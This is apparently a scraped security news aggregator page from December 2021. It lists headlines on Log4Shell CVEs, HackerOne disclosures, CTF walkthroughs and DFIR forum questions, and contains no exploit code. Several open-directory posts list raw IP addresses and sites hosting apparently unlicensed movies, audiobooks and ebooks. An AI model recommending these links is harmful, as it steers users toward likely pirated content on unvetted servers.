    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )
  • Open

    Any good tools for forensic analyzing a MariaDB?
    Dear community, What would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub but would like to hear what you are using? Anything helps, thank you submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What's are good workflows/resources for analyzing PCAPs?
    Hey community, 24 years old SIEM administrator who's currently self-studying to become a network forensics analyst. I'm reading books/watching youtube videos/doing some SANS and Chris Sanders courses but I want to hear from the subreddit - what's a good workflow or some tips when starting to analyze PCAPS? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? what would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also what CTF website do you recommend specified for digital forensics ? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-14 Review
    浅谈被动式IAST产品与技术实现 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2021-12-14 Review
    浅谈被动式IAST产品与技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )
  • Open

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE - CNA, for some bugs that I found in an open-source project, the bugs have been aknowledged by the vendor and patched. It's Tuesday today and aside from the automated email right after the request they didn't come back to me. Is this normal? Does it take usually that long ? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )
  • Open

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264
  • Open

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulernable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading Internal server Error on Popular hastags , Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com ‘s content. PDFs: https://lira.epac.to/DOCS-TECH/Security/ https://lira.epac.to/DOCS-TECH/ https://www.miralishahidi.ir/resources/ https://www.kgay4all.com/seioqueseiporleroqueleio/ https://theswissbay.ch/pdf/ http://index-of.es http://s28.bitdl.ir/?C=N&O=A -(edit)-a lot of files with the same size and overall feels a bit sus. Proceed with extra caution. https://ihatefeds.com http://www.aetkin.com/files/Real%20Analysis%20Qual%20Study%20Questions/ http://mis.kp.ac.rw/admin/admin_panel/kp_lms/files/digital/ http://incompleteideas.net/book/ Questionable directories https://ebook-mecca.com/ebooks/?SA http://47.219.34.42:8081/Files/ -(edit)-I think he’s dead, Jim. https://docs.spring.io/spring-amqp/docs/ https://docs.jboss.org/weld/reference/ https://www.scons.org/doc/ https://www.unicode.org/Public/ https://www.unicode.org/Public/UCD/latest/charts/ https://ftp.rush.edu/users/molebio/ https://www.nsula.edu/documentprovider/docs/ https://spdf.gsfc.nasa.gov/pub/software/cdf/doc/ https://bannerwitcoff.com/wp-content/uploads/ https://www.uvm.edu/~swac/docs/ http://ftp.axis.com • https://www.orfeo-toolbox.org/packages/ci/CookBook/ Directory- https://www.orfeo-toolbox.org/packages/ci/ submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki周刊(第406期) by ourren 从一例挖矿木马看 Log4Shell 的在野传播 by Avenger 更多最新文章,请访问SecWiki
    SecWiki News 2021-12-13 Review
    SecWiki周刊(第406期) by ourren 从一例挖矿木马看 Log4Shell 的在野传播 by Avenger 更多最新文章,请访问SecWiki
  • Open

    【安全通报】Apache Log4j2 远程代码执行漏洞
    近日,网络上出现 Apache Log4j2 远程代码执行漏洞。攻击者可利用该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及...  ( 4 min )
  • Open

    【安全通报】Apache Log4j2 远程代码执行漏洞
    近日,网络上出现 Apache Log4j2 远程代码执行漏洞。攻击者可利用该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于该漏洞影响范围极广,建议广大用户及...  ( 4 min )
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    如何使用 X.XYZ 铸造和交易您的 NFT
    x.xyz是一个几乎零gas的NFT交易平台,X运行在fantom网络上,所以 Continue reading on Medium »  ( 2 min )

  • Open

    Private OOB 테스팅을 위한 Self Hosted Interactsh
    이번 주말은 log4shell로 인해 정말 인터넷이 불타고 있습니다. 자 이제 보안담당자들은 이를 대응하고 자산에 대해 스캐닝을 진행하게 될텐데, 여기서 식별에 사용하는 대표적인 방법인 OOB(Out-Of-Band)를 알려진 서비스들(ZAP OAST, Burpsuite collaborator, Interactsh 등)을 이용하여 편하게 테스팅할 수 있겠지만, 이는 결국 외부에 callback이 발생한 서버의 IP가 남게되고, 이를 통해서 해당 서비스를 운영하는 운영하는 회사 또는 그룹 등 정보를 얻어갈 수 있는 구간이 존재하게 됩니다. (썩 좋은 그림은 아니죠) 그래서 오늘은 Private하게 OOB를 테스트할 수 있도록 VPC와 DNS Glue Record를 이용하여 interactsh 서버를 따로 구축하고 사용하는 방법에 대해 이야기할까 합니다.
  • Open

    HackMyVM — Furious
    Writeup (Español) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate windows PCs. only definitive info i have is the file itself, which is a pdf of a scanned document. file was deleted 2019 and removed from recycle bin. hey all not sure where to start here, hoping someone can point me in the right direction. ive got a pdf file of a scanned document. that is all i know about the file. not sure if the name would have been changed, if it was originally a .docx, nothing. my first question is how to find it if it isnt deleted? i opened it up in notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools) but it was hit or miss as to if it found it 2nd question is how to find it if it was deleted. the file dates back to 2019 and these computers are used on a daily basis, so im not very hopeful the data wouldnt have been overwritten by now. ​ thanks in advnace submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR netwars and I’m confident everywhere except smartphones and macOS. I know we’ll be given apple hfs/apfs and iOS and android acquisitions which I’m not sure how to even approach. So was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    http://109.120.203.163/lvm/animation%20and%20puppets/ http://185.141.213.228/Animation/ https://185.107.32.136/Animation/ http://tajmovie.ir/Animation/ https://dl1.zflix.ir/Animation/ https://dl3.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ https://dl1.fastmovie.ir/Movie/Animation/ https://dl5.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ http://46.4.39.111/--KIDS-SERIES/ Anime: http://75.86.210.23/archive/ANIMU/ http://neet.rehab/anime/ == https://149.28.180.59/anime/ http://51.158.151.61:8080/Animoos/ http://148.251.73.149/Anime&Manga/ http://149.28.180.59/anime/ http://149.28.180.59/anime/ http://509.rbx.abcvg.ovh/ submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000
  • Open

    Log4shell 전 세계의 인터넷이 불타고 있습니다 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    네 바로 어제(2021-12-10) Java의 logging package인 log4j2 에서 RCE 0-day 취약점이 공개되었습니다. Service, Application에 로그를 쌓을수만 있다면 어떤 환경에서도 공격 가능성이 존재하고, 리스크가 RCE인 만큼 정말 전 세계가 불타오르고 있네요. (하하 DM도 터져나갑니다. 안볼거에요……) 일이 우선이니 어제는 대응에 집중하고, 하루 늦은 오늘 글로 공유하려고 합니다. 어디가… 사실 아직 끝난게 아니야… 이후에도 추가건인 CVE-2021-45046과 CVE-2021-45105로 대응해야 할 것들이 더 있어서 최초 공개인 금요일부터 그 다음주까진 정신없이 보냈던 것 같습니다. 아무튼 모든 Security engineer와 Developer, DevOps 등 이 사건으로 고생하신 모든 분들께 경의를 표합니다 👏🏼
    웹 해커를 위한 Browser Addons
    여러분들은 보안 테스팅 시 웹 브라우저 Addon 많이 사용하시나요? 저는 한 떄 엄청나게 많이 설치해서 사용했지만, 지금은 5개 미만을 유지하는 것 같네요. 오늘은 보안 테스팅 시 유용한 Addon을 소개하고 제가 어떤식으로 변화하며 사용했는지 공유드릴까 합니다. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store 변화 저는 예전에는 브라우저 Addon을 많이 사용 했었습니다.

  • Open

    Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28)
    We provide background and a root cause analysis of CVE-2021-44228, a remote code execution vulnerability in Apache log4j, and we recommend mitigations. The post Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) appeared first on Unit42.
  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post show how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    Go 1.18 ile Neler Geliyor?
    2022 yılının ilk çeyreğinde yayınlanması planlanan Go 1.18 versiyonuyla birlikte bizleri birçok yeni özellikler bekliyor. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order informations and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101
  • Open

    Chrome on Windows performance improvements and the journey of Native Window Occlusion
    Whether you prefer organizing your browser with tab groups, naming your windows, tab search, or another method, you have lots of features that help you get to the tabs you want. In this The Fast and the Curious post, we describe how we use what windows are visible to you to optimize Chrome, leading to 25.8% faster start up and 4.5% fewer crashes. Background For several years, to improve the user experience, Chrome has lowered the priority of background tabs[1]. For example, JavaScript is throttled in background tabs, and these tabs don’t render web content. This reduces CPU, GPU and memory usage, which leaves more memory, CPU and GPU for foreground tabs that the user actually sees. However, the logic was limited to tabs that weren't focused in their window, or windows that were minimiz…
  • Open

    Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering
    Patient zero web threats are malicious URLs that are being seen for the first time. We discuss how to stop them despite attacker cloaking techniques. The post Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering appeared first on Unit42.

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

    【安全通报】Grafana 未授权任意文件读取 0day 漏洞
    近日,网络上出现 Grafana 未授权任意文件读取的 0day 漏洞,漏洞细节暂未公开。攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。  ( 1 min )
  • Open

    【安全通报】Grafana 未授权任意文件读取 0day 漏洞
    近日,网络上出现 Grafana 未授权任意文件读取的 0day 漏洞,漏洞细节暂未公开。攻击者可通过该漏洞在未经身份验证的情况下读取主机上的任意文件。  ( 1 min )
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )
  • Open

    ZAP RootCA를 API와 Cli-Arguments로 제어하기
